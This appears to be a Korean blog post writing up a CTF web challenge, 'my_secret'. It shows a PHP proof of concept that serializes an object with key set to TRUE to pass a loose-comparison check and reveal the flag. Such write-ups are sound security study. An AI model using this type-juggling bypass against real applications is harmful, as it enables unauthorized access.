[ H4C Game ] 웹 풀어보기

sangjun

·

2022. 3. 26. 00:32

반응형

1. my_secret

- php unserialize취약점도 아닌듯 

- php unserialize취약점 트리거 조건을 만족하지 않는다.
        1. 매직 메소드를 구현한 클래스가 있어야 함
        2. 모든 클래스는 취약한 unserialize()가 호출되기 전에 선언되어야 한다.

- 그냥 객체를 새로 만들어 줄 수가 있는데 이것으로 $obj->key == I_am_robot 여길 우회해야 한다.

- 느슨한 비교를 우회 해야된다.

- 아래와 같이 poc를 만들어 보니까 되서 리모트도 됐다.

- 이참에 느슨한 비교와 엄격한 비교를 공부해보자.

<?php
    $flag="test_flag";
    // class obj{
    //     var $pass = "I_WANT_FLAG";
    //     var $key = "TOP SECRET";
    // }
    class obj{
      var $pass = "I_WANT_FLAG";
      var $key=TRUE;
  }

    $obj  = new obj;
    //$sol = $_GET["sol"];
    echo serialize($obj);
    //$obj = unserialize($sol);
    
    // if(isset($obj->key))
    //   echo $obj->key;

    if(isset($obj->pass)){
        if($obj->key == 1){
            echo "<br \>oh! you are access my secret<br>";
            echo "<h1>".$flag."</h1>";
        }
    }
?>

- 공부할게 없다 이 표를 참고해서 알잘딱깔센으로 페이로드 만들면 된다.

 

반응형

'War Games > ctf-review' 카테고리의 다른 글

[ AngstromCTF 2022 ] CTF 딱 1년 차  (2) 2022.05.05
[ H4C Game ] 웹 풀어보기  (0) 2022.03.26
2022 Kaist GON CTF  (0) 2022.03.23
코드게이트 2022라업 VIMT  (0) 2022.02.28
[ CSAW CTF 2021 ] word_games  (0) 2021.09.13
[ CSAW CTF 2021 ] procrastination-simulator  (0) 2021.09.13

0개의 댓글